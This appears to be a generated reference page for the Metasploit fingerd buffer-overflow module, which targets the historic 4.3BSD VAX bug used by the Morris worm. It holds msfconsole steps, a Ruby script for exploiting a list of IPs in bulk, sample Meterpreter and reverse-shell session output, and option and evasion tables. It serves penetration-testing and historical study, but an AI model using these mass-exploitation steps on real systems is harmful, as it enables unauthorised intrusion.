Morris Worm fingerd Stack Buffer Overflow - Metasploit


This page contains detailed information about how to use the exploit/bsd/finger/morris_fingerd_bof metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Morris Worm fingerd Stack Buffer Overflow
Module: exploit/bsd/finger/morris_fingerd_bof
Source code: modules/exploits/bsd/finger/morris_fingerd_bof.rb
Disclosure date: 1988-11-02
Last modification time: 2020-09-18 11:38:43 +0000
Supported architecture(s): vax
Supported platform(s): BSD
Target service / protocol: -
Target network port(s): 79
List of CVEs: -

This module exploits a stack buffer overflow in fingerd on 4.3BSD. This vulnerability was exploited by the Morris worm in 1988-11-02. Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg. Currently, only bsd/vax/shell_reverse_tcp is supported.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


Using morris_fingerd_bof against a single host

Normally, you can use exploit/bsd/finger/morris_fingerd_bof this way:

msf > use exploit/bsd/finger/morris_fingerd_bof
msf exploit(morris_fingerd_bof) > show targets
    ... a list of targets ...
msf exploit(morris_fingerd_bof) > set TARGET target-id
msf exploit(morris_fingerd_bof) > show options
    ... show and set options ...
msf exploit(morris_fingerd_bof) > exploit

Using morris_fingerd_bof against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your morris_fingerd_bof will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/bsd/finger/morris_fingerd_bof")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


Description

This module exploits a stack buffer overflow in fingerd on 4.3BSD.

This vulnerability was exploited by the Morris worm in 1988-11-02. Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.

Setup

A Docker environment for 4.3BSD on VAX is available at https://github.com/wvu/ye-olde-bsd.

For manual setup, please follow the Computer History Wiki's guide or Allen Garvin's guide if you're using Quasijarus.

Verification Steps


Follow Setup and Scenarios.

Targets


0

This targets fingerd version 5.1 from 1985-06-06.

Options


RPORT

Set this to the target port. The default is 79 for fingerd, but the port may be forwarded when NAT (SLiRP) is used in SIMH.

PAYLOAD

Set this to a BSD VAX payload. Currently, only bsd/vax/shell_reverse_tcp is supported.

Scenarios


fingerd 5.1 on 4.3BSD

msf5 > use exploit/bsd/finger/morris_fingerd_bof
msf5 exploit(bsd/finger/morris_fingerd_bof) > options

Module options (exploit/bsd/finger/morris_fingerd_bof):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT   79               yes       The target port (TCP)


Payload options (bsd/vax/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   @(#)fingerd.c   5.1 (Berkeley) 6/6/85


msf5 exploit(bsd/finger/morris_fingerd_bof) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(bsd/finger/morris_fingerd_bof) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf5 exploit(bsd/finger/morris_fingerd_bof) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] 127.0.0.1:79 - Connecting to fingerd
[*] 127.0.0.1:79 - Sending 533-byte buffer
[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.1:58015) at 2020-02-06 15:45:33 -0600

who am i
nobody   tty??   Feb  6 13:45
cat /etc/motd
4.3 BSD UNIX #1: Fri Jun  6 19:55:29 PDT 1986

Would you like to play a game?

Go back to menu.

Msfconsole Usage


Here is how the bsd/finger/morris_fingerd_bof exploit module looks in the msfconsole:

msf6 > use exploit/bsd/finger/morris_fingerd_bof

[*] Using configured payload bsd/vax/shell_reverse_tcp
msf6 exploit(bsd/finger/morris_fingerd_bof) > show info

       Name: Morris Worm fingerd Stack Buffer Overflow
     Module: exploit/bsd/finger/morris_fingerd_bof
   Platform: BSD
       Arch: vax
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 1988-11-02

Provided by:
  Robert Tappan Morris
  Cliff Stoll
  wvu <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   @(#)fingerd.c   5.1 (Berkeley) 6/6/85

Check supported:
  Yes

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT   79               yes       The target port (TCP)

Payload information:
  Space: 403
  Avoid: 1 characters

Description:
  This module exploits a stack buffer overflow in fingerd on 4.3BSD. 
  This vulnerability was exploited by the Morris worm in 1988-11-02. 
  Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg. 
  Currently, only bsd/vax/shell_reverse_tcp is supported.

References:
  https://en.wikipedia.org/wiki/Morris_worm
  https://spaf.cerias.purdue.edu/tech-reps/823.pdf
  http://computerarcheology.com/Virus/MorrisWorm/
  https://github.com/arialdomartini/morris-worm
  http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH

Module Options


This is a complete list of options available in the bsd/finger/morris_fingerd_bof exploit:

msf6 exploit(bsd/finger/morris_fingerd_bof) > show options

Module options (exploit/bsd/finger/morris_fingerd_bof):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   79               yes       The target port (TCP)

Payload options (bsd/vax/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   @(#)fingerd.c   5.1 (Berkeley) 6/6/85

Advanced Options


Here is a complete list of advanced options supported by the bsd/finger/morris_fingerd_bof exploit:

msf6 exploit(bsd/finger/morris_fingerd_bof) > show advanced

Module advanced options (exploit/bsd/finger/morris_fingerd_bof):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   AutoCheck               true             no        Run check before exploit
   CHOST                                    no        The local client address
   CPORT                                    no        The local client port
   ConnectTimeout          10               yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   ForceExploit            false            no        Override check result
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL                     false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode           PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion              Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session

Payload advanced options (bsd/vax/shell_reverse_tcp):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the bsd/finger/morris_fingerd_bof module can exploit:

msf6 exploit(bsd/finger/morris_fingerd_bof) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   @(#)fingerd.c   5.1 (Berkeley) 6/6/85

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the bsd/finger/morris_fingerd_bof exploit:

msf6 exploit(bsd/finger/morris_fingerd_bof) > show payloads

Compatible Payloads
===================

   #  Name                               Disclosure Date  Rank    Check  Description
   -  ----                               ---------------  ----    -----  -----------
   0  payload/bsd/vax/shell_reverse_tcp                   normal  No     BSD Command Shell, Reverse TCP Inline

Evasion Options


Here is the full list of possible evasion options supported by the bsd/finger/morris_fingerd_bof exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(bsd/finger/morris_fingerd_bof) > show evasion

Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Robert Tappan Morris
  • Cliff Stoll
  • wvu

Version


This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.